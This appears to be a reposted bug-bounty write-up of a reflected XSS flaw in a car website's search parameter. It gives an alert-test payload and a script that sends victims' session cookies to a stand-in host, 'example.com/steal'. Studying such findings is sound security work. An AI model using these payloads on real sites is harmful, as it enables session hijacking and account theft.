Discovery of Reflected XSS Vulnerability on a Global Car Website #2

1 month ago 24
BOOK THIS SPACE FOR AD
ARTICLE AD

VulnSniper

As part of my ongoing security assessments on popular websites, I’ve once again identified a Reflected Cross-Site Scripting (RXSS) vulnerability on a well-known global car website. This vulnerability allowed me to inject and execute JavaScript on the user's browser, displaying an alert and retrieving sensitive information such as session cookies.

In this write-up, I’ll provide a detailed explanation of how I discovered the vulnerability, exploited it, and present the full technical code used to achieve it.

The vulnerability is a Reflected Cross-Site Scripting (RXSS), a security flaw in web applications where an attacker can inject malicious JavaScript into input fields that are not properly sanitized, leading to the execution of the script on the victim’s browser when a specific request is triggered.

The target is a globally recognized website that specializes in car sales and car information.

During my testing of the website’s search input field, I observed that the input was not being properly sanitized or protected against harmful user input. I injected a simple JavaScript payload to test for the possibility of code injection.

The GET parameter from the search input field.

I injected the following payload into the search box

?query=<img/src/onerror=alert(`XSS`)>

After submitting the search, the alert popped up in the browser, confirming the existence of the RXSS vulnerability.

To extend the attack, I injected a more malicious payload that extracts the session cookies of the user and sends them to a server I control:

<script>
var img = new Image();
img.src = "http://example.com/steal?cookie=" + document.cookie;
</script>
The first line creates an img element.The second line sets the image source (src) to point to my external server while appending the user’s cookies to the URL as a query parameter. This sends the cookies to the attacker’s server.

The attack was successful, allowing me to retrieve users’ session cookies, which can potentially be used to hijack their accounts without requiring their login credentials.

Read Entire Article